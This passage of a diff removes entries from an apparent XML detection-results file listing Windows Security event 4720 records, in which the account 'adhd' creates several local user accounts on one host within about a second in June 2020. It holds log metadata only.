-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.6070834Z'/&gt;&lt;EventRecordID&gt;4879&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Angela&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1139&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Angela&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Angela</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4873</recordid>
-            <time>2020-06-11 22:05:04.524242000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.5242420Z'/&gt;&lt;EventRecordID&gt;4873&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Marie&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1138&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Marie&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Marie</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4867</recordid>
-            <time>2020-06-11 22:05:04.450190500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.4501905Z'/&gt;&lt;EventRecordID&gt;4867&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Richard&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1137&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Richard&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Richard</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4861</recordid>
-            <time>2020-06-11 22:05:04.365748900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.3657489Z'/&gt;&lt;EventRecordID&gt;4861&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Dorothy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1136&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Dorothy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Dorothy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4855</recordid>
-            <time>2020-06-11 22:05:04.286082800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.2860828Z'/&gt;&lt;EventRecordID&gt;4855&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Ryan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1135&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Ryan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Ryan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4849</recordid>
-            <time>2020-06-11 22:05:04.116019500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.1160195Z'/&gt;&lt;EventRecordID&gt;4849&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Abigail&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1134&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Abigail&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Abigail</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4843</recordid>
-            <time>2020-06-11 22:05:04.19943600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.0199436Z'/&gt;&lt;EventRecordID&gt;4843&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Philip&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1133&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Philip&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Philip</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4837</recordid>
-            <time>2020-06-11 22:05:03.947118900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.9471189Z'/&gt;&lt;EventRecordID&gt;4837&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Lori&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1132&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Lori&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Lori</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4831</recordid>
-            <time>2020-06-11 22:05:03.862304200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.8623042Z'/&gt;&lt;EventRecordID&gt;4831&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Andrew&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1131&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Andrew&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Andrew</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4825</recordid>
-            <time>2020-06-11 22:05:03.772439300Z</time>
-            <channel>Security</channel>
